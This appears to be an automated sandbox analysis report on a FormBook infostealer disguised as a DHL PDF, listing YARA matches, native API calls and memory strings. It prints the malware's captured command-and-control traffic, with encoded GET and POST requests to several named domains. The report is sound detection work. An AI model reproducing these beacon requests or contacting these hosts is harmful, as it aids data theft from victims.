Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 68 52 6d 6b 33 2d 62 70 38 4d 73 30 7a 41 28 4d 62 67 79 61 5a 5f 59 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIhRmk3-bp8Ms0zA(MbgyaZ_Y.
Source: unknown DNS traffic detected: queries for: www.yongleproducts.com
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIbedtv8fxp/SmPPkaBaUqgtGDC HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0h38HiNDm4XeyJxX5vlkTTrS1xP HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: DHL_Notification_pdf.exe
Uses 32bit PE files
Source: DHL_Notification_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Detected potential crypto function
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00410371 1_2_00410371
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00405843 3_2_00405843
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401801 3_2_00401801
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401803 3_2_00401803
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401810 3_2_00401810
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004038C3 3_2_004038C3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004228C4 3_2_004228C4
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004230E8 3_2_004230E8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004038B9 3_2_004038B9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0042219B 3_2_0042219B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401A65 3_2_00401A65
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00422211 3_2_00422211
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00421A8C 3_2_00421A8C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401BA0 3_2_00401BA0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004223BA 3_2_004223BA
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401CA5 3_2_00401CA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401CB0 3_2_00401CB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040561A 3_2_0040561A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00420623 3_2_00420623
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00405623 3_2_00405623
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00422EAB 3_2_00422EAB
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040BFEE 3_2_0040BFEE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040BFF3 3_2_0040BFF3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00421F81 3_2_00421F81
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE20A8 3_2_00AE20A8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B090 3_2_00A2B090
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE28EC 3_2_00AE28EC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AEE824 3_2_00AEE824
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1002 3_2_00AD1002
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1F900 3_2_00A1F900
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE22AE 3_2_00AE22AE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4EBB0 3_2_00A4EBB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADDBD2 3_2_00ADDBD2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE2B28 3_2_00AE2B28
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2841F 3_2_00A2841F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADD466 3_2_00ADD466
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2D5E0 3_2_00A2D5E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE25DD 3_2_00AE25DD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A10D20 3_2_00A10D20
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE2D07 3_2_00AE2D07
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE1D55 3_2_00AE1D55
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE2EF7 3_2_00AE2EF7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A36E30 3_2_00A36E30
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADD616 3_2_00ADD616
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE1FF1 3_2_00AE1FF1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AEDFCE 3_2_00AEDFCE
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: String function: 00A1B150 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: String function: 004019C0 appears 42 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E533 NtCreateFile, 3_2_0041E533
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E5E3 NtReadFile, 3_2_0041E5E3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E663 NtClose, 3_2_0041E663
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E713 NtAllocateVirtualMemory, 3_2_0041E713
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E52E NtCreateFile, 3_2_0041E52E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E5DD NtReadFile, 3_2_0041E5DD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A598F0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A59860
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59840 NtDelayExecution,LdrInitializeThunk, 3_2_00A59840
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A599A0 NtCreateSection,LdrInitializeThunk, 3_2_00A599A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A59910
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A20 NtResumeThread,LdrInitializeThunk, 3_2_00A59A20
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A59A00
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A50 NtCreateFile,LdrInitializeThunk, 3_2_00A59A50
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A595D0 NtClose,LdrInitializeThunk, 3_2_00A595D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59540 NtReadFile,LdrInitializeThunk, 3_2_00A59540
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A596E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A59660
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A597A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A59780
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A59FE0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A59710
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A598A0 NtWriteVirtualMemory, 3_2_00A598A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59820 NtEnumerateKey, 3_2_00A59820
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5B040 NtSuspendThread, 3_2_00A5B040
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A599D0 NtCreateProcessEx, 3_2_00A599D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59950 NtQueueApcThread, 3_2_00A59950
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A80 NtOpenDirectoryObject, 3_2_00A59A80
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A10 NtQuerySection, 3_2_00A59A10
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5A3B0 NtGetContextThread, 3_2_00A5A3B0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59B00 NtSetValueKey, 3_2_00A59B00
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A595F0 NtQueryInformationFile, 3_2_00A595F0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59520 NtWaitForSingleObject, 3_2_00A59520
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5AD30 NtSetContextThread, 3_2_00A5AD30
